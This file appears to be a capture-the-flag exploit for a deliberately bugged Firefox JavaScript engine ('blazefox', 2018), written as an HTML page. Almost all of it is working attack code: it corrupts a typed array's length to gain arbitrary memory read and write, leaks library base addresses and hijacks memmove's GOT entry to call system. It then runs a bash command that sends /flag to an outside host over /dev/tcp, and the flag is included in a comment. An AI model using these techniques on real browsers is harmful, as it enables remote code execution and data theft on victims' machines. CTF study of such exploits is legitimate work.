Blaze2018/blazefox/exploit.html

<!DOCTYPE html>
<html>
<!-- flag{fire_just_makes_the_blaze_better} -->
<head>
    <meta charset="utf-8">
    <script src="utils.js"></script>
    <title></title>
    <script type="text/javascript">
    function exploit() {
        arr = [0x11223344];

        ab = new ArrayBuffer(32);
        overwrite_len = new Uint32Array(ab);
        overwrite_len[0] = 0x77777777;

        victim_ab = new ArrayBuffer(32);
        victim = new Uint32Array(victim_ab);
        victim[0] = 0x88888888;

        log("starting");
        arr.blaze();

        arr[7] = 0x10000;

        var ptr_overwrite_idx = -1;
        for (var i = 0; i < 1000; i++) {
            if (overwrite_len[i] == 0x88888888) {
                overwrite_len[i] = 0x98888888;
                ptr_overwrite_idx = i;
                break;
            }
        }

        log(`ptr_overwrite_idx ${ptr_overwrite_idx} `);
        if (ptr_overwrite_idx == -1) {
            return;
        }


        // from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js
        memory = {
            prepare: function(addr, typed_array) {
                x = new Int64(addr);
                x.rshift();
                overwrite_len[ptr_overwrite_idx - 8] = x.lower();
                overwrite_len[ptr_overwrite_idx - 7] = x.upper();
                return new typed_array(victim_ab);
            },

            write: function(addr, data) {
                view = memory.prepare(addr, Uint32Array);
                x = new Int64(data)
                view[0] = x.lower();
                view[1] = x.upper();
            },

            read: function(addr) {
                view = memory.prepare(addr, Uint32Array);
                return new Int64(view[0] + 256 ** 4 * view[1]);
            },

            readWithTag: function(addr) {
                view = memory.prepare(addr, Uint32Array);
                return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff));
            }
        }

        function leak_native(nat_func) {
            victim_ab.yolo = nat_func;
            victim_ab.haha = 0x13391339;
            slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12];
            slots_0 = (memory.readWithTag(slots).toInt());

            return memory.read(slots_0 + 5 * 8).toInt()
        }

        nat_func = leak_native(Date.now);
        log("[+] Date.now @ " + nat_func.toString(16) + "\n");

        xul_base = nat_func - 0x49c7ab0;
        memmove_got = xul_base + 0x0000818b220;
        dup_got = xul_base + 0x0000818b738;

        dup_libc = memory.read(dup_got);
        libc_base = dup_libc - 0xf7940;
        system_libc = libc_base + 0x45390;

        log("[+] xul base @ " + xul_base.toString(16), true);
        log("[+] memmove@got @ " + memmove_got.toString(16), true);
        log("[+] libc_base@libc_@_" + libc_base.toString(16), true);
        log("[+] system@libc @ " + system_libc.toString(16), true);

        var target = new Uint8Array(100);
        var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &";

        for (var i = 0; i < cmd.length; i++) {
            target[i] = cmd.charCodeAt(i);
        }
        target[cmd.length] = 0;

        memmove_backup = memory.read(memmove_got);

        memory.write(memmove_got, system_libc);
        target.copyWithin(0, 1);
        memory.write(memmove_got, memmove_backup);

    }

    exploit();
    </script>
</head>

<body>
</body>

</html>
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0  →  0x8899001177889900 -->